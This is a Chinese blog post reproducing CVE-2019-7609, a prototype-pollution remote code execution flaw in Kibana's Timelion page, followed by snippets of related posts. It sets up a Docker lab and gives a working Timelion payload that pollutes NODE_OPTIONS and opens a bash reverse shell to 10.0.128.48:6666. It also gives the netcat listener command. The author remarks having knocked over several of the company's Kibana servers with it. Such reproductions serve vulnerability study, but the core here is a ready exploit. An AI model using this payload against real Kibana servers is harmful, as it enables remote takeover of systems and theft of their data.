Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609)

最新推荐文章于 2024-08-19 09:55:02 发布
最新推荐文章于 2024-08-19 09:55:02 发布
阅读量556 收藏
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44508748/article/details/111187399
版权

Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.15到6.6.1之间的版本中存在一处原型链污染漏洞,利用这个漏洞我们可以在目标服务器上执行任意JavaScript代码。

目前公开的 POC 因为使用了 linux 特有的环境变量,所以目前这个 POC 只能作用于 linux 机器。

启动环境前,需要先在Docker主机上执行如下命令,修改vm.max_map_count配置为262144:

sysctl -w vm.max_map_count=262144

之后,执行如下命令启动Kibana 6.5.4和Elasticsearch 6.8.6:

docker-compose up -d

环境启动后,访问http://your-ip:5601即可看到Kibana页面。原型链污染发生在“Timeline”页面,我们填入如下Payload:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/10.0.128.48/6666 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
  1. 监听:nc -lvp 6666
  2. 打payload在这里插入图片描述
    3.访问canvas模块触发漏洞在这里插入图片描述
    4.反弹shell
    在这里插入图片描述
    ps:不要乱打。公司Kibana 被我打挂好几个。
Min1996
关注
专栏目录
web渗透测试漏洞复现:Kibana 未授权访问
HACKONE的博客
03-20 621
Kibana是一个开源的分析与可视化平台,设计出来用于和Elasticsearch一起使用的。你可以用kibana搜索、查看存放在Elasticsearch中的数据。Kibana与Elasticsearch的交互方式是以各种不同的图表、表格、地图等直观地展示数据,从而达到高级的数据分析与可视化的目的。Elasticsearch、Logstash和Kibana这三个技术就是我们常说的ELK技术栈,可以说这三个技术的组合是大数据领域中一个很巧妙的设计。一种很典型的MVC思想,模型持久层,视图层和控制层。
Kibana未授权访问漏洞记录(CVE-2019-7609Kibana的RCE,原型链污染,端口:5601)
墨痕诉清风的博客
11-12 5274
漏洞描述 Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.15到6.6.1之间的版本中存在一处原型链污染漏洞,利用这个漏洞我们可以在目标服务器上执行任意JavaScript代码漏洞复现 环境启动后,访问 http://your-ip:5601 即可看到Kibana页面。 原型链污染发生在“Timeline”页面,我们填入如下Payload: 创建文件 .es(*).props(label.__proto__.env.AAAA='require("chil
CVE-2019-7609 项目使用教程
最新发布
gitblog_00739的博客
08-19 361
CVE-2019-7609 项目使用教程 CVE-2019-7609exploit CVE-2019-7609(kibana RCE) on right way by python2 scripts项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2019-7609 1. 项目的目录结构及介绍 CVE-2019-7609/ ├── README.md ├── ...
Kibana任意文件包含漏洞(CVE-2018-17246)
EC_Carrot的博客
07-07 842
漏洞详细 Kibana是一个开源的分析与可视化平台,设计出来用于和Elasticsearch一起使用的。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。如果能够上传一个文件,就能够包含该文件来执行代码漏洞复现 首先在靶机内创个代码文件,以便后续操作 #echo '...code...' > /tmp/vulhub.js export default {asJson: function() {return require("child_proc
Kibana远程代码执行漏洞(CVE-2019-7609)
MD@@nr丫卡uer
11-24 783
Kibana远程代码执行漏洞(CVE-2019-7609) 漏洞简介 2019年2月官方发布公告称Kibana存在远程代码执行漏洞,5.6.15 和 6.6.1之前的 Kibana 版本在 Timelion 可视化工具中存在功能缺陷,导致攻击者可在服务器上利用Kibana执行任意代码Kibana 是 Elasticsearch 的开源数据可视化插件。它为Elasticsearch提供可视化功能,可以用来搜索和查看存储在Elasticsearch索引中的数据,并可以将数据以各种图标、表格和地图的形式进行可视
Kibana远程代码执行漏洞CVE-2019-7609)复现
玄道的网安博客
09-27 1128
简介 攻击者利用漏洞可以通过Timelion组件中的JavaScript原型链污染攻击,向Kibana发起相关请求,从而接管所在服务器,在服务器上执行任意命令。 影响版本 Kibana < 6.6.1 Kibana < 5.6.15 环境搭建 首先去官网下载6.5.3的tar包并解压 wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.5.3.tar.gz ...
Kibana未授权访问漏洞复现、CVE-2019-7609 Kibana远程代码执行漏洞复现
热门推荐
weixin_43061533的博客
12-25 1万+
0x01 漏洞简述 Kibana如果允许外网访问,没有做安全的登录认证,也会被外部随意访问查看所有的数据,造成少数据泄露。在默认配置下,Kibana就可以访问Elasticsearch中的所有数据。 0x02 知识扩展 Kibana是一个开源的分析与可视化平台,设计出来用于和Elasticsearch一起使用的。你可以用kibana搜索、查看存放在Elasticsearch中的数据。Kibana与Elasticsearch的交互方式是各种不同的图表、表格、地图等,直观的展示数据,从而达到高级的数据分析
CVE-2019-7609:在Timelion可视化工具中的Kibana版本5.6.15和6.6.0之前的RCE
04-25
CVE-2019-7609 5.6.15和6.6.1之前的Kibana版本在Timelion可视化工具中包含任意代码执行缺陷。 有权访问Timelion应用程序的攻击者可以发送将尝试执行javascript代码的请求。 这可能导致攻击者在主机系统上以Kibana...
Kibana远程代码执行漏洞攻击方法和漏洞原理分析
HBohan的博客
07-04 1656
漏洞简介 Kibana存在远程代码执行漏洞,影响版本为5.6.15和6.6.0之前的所有版本。拥有Kibana的Timelion模块访问权限的人可以以Kibana的运行权限执行任意代码,包括反弹shell。 环境搭建 领取相关学习资料 靶机环境: Parrot Security OS 4.7 64位 或其他类Linux操作系统(VMWare 14) Elasticsearch6.5.4 Kibana 6.5.4 IP:10.10.10.128 攻击机环境: Windows 10 Home 64.
gatsby-eui-starter:使用Gatsby EUI Starter快速开始构建Kibana原型
03-09
Elastic的Gatsby EUI入门 立即开始使用构建Kibana原型。 :rocket: 快速开始 安装盖茨比。 假设您已经安装了NPM,请全局安装gatsby-cli。 npm install -g gatsby-cli 创建一个Gatsby网站。 使用Gatsby CLI创建一个新站点,并指定EUI启动器。 # create a new Gatsby site using the default starter gatsby new my-eui-starter https://github.com/elastic/gatsby-eui-starter 开始开发。 导航到新站点的目录并启动。 cd my-eui-starter/ gatsby develop 打开源代码并开始编辑! 您的站点现在在http://localhost:8000 ! 注意:您还将看到第二个链接
Elasticsearch 核心插件Kibana 本地文件包含漏洞分析(CVE-2018-17246)
ahhacker86的专栏
01-23 1395
LFI通常出现在PHP应用中,通样是require这次应用在Nodejs程序中,相信未来还会有更多的Nodejs程序存在这种问题,原因是本地包含漏洞出现了很多年,但依旧有很多软件开发人员和架构师没有考虑到这点,这篇文章很好的说明了Kibana中存在的一个关键LFI漏洞,使得攻击者能够在服务器上运行本地代码,可造成直接的危害就是拒绝服务攻击,若在生产环境下业务实在伤不起,需要引起对Nodejs LFI的重视。
Kibana未授权访问漏洞
lhdbk______的博客
08-05 351
Kibana未授权访问漏洞
Kibana原型污染导致远程执行代码 CVE-2019-7609 漏洞复现
ADummy的博客
03-07 286
Kibana原型污染导致远程执行代码CVE-2019-7609) by ADummy 0x00利用路线 ​ 0x01漏洞介绍 ​ Kibana是Elasticsearch的开源数据可视化仪表板。 5.6.15和6.6.1之前的Kibana版本在Timelion可视化工具中包含任意代码执行缺陷。有权访问Timelion应用程序的攻击者可以发送将尝试执行javascript代码的请求。这可能导致攻击者在主机系统上以Kibana进程的权限执行任意命令。 影响版本 Kibana <= 5.6.15 Ki
【严重】Kibana 8.7.0 任意代码执行漏洞
murphysec的博客
05-23 1309
Kibana是用于Elasticsearch的数据可视化仪表板。Kibana在8.7.0版本引入了Synthetic监控功能,用户可配置编写playwright中的javascript代码实现web应用监控。 具备Kibana登录权限的攻击者可利用此功能编写恶意playwright脚本, 从而在Kibana主机中执行任意系统命令。
kibana 漏洞收集总结
sojrs_sec的博客
12-31 7707
一:cve-2019-7609 命令执行 Kibana存在远程代码执行漏洞,影响版本为5.6.15和6.6.0之前的所有版本。拥有Kibana的Timelion模块访问权限的人可以以Kibana的运行权限执行任意代码,包括反弹shell 访问 http://ip:5601/app/timelion 输入payload .es(*).props(label.__proto__.env.AAAA='...
kibana漏洞复现
Shanfenglan's blog
11-30 2376
文章目录1. kibana是什么2. CVE-2018-17246 文件包含漏洞2.1 利用3. Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609)3.1 利用 1. kibana是什么 一般与Elasticsearch一起工作,作用是将Elasticsearch中的数据可视化的表现出来并与之进行交互。它本身是一个web应用,可以通过5601端口去访问。 2. CVE-2018-17246 文件包含漏洞 影响版本: 5.6.13到6.4.3 2.1 利用 通常情况下Kibana
Kibana 7.16.2 for Windows x86-64 架构详解
作为 Elastic Stack 的一部分,Kibana 允许用户通过图形界面浏览 Elasticsearch 索引,并执行各种数据分析任务。它支持实时地对存储在 Elasticsearch 中的大规模数据集进行搜索、查看和交互,以发现数据的模式、趋势...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值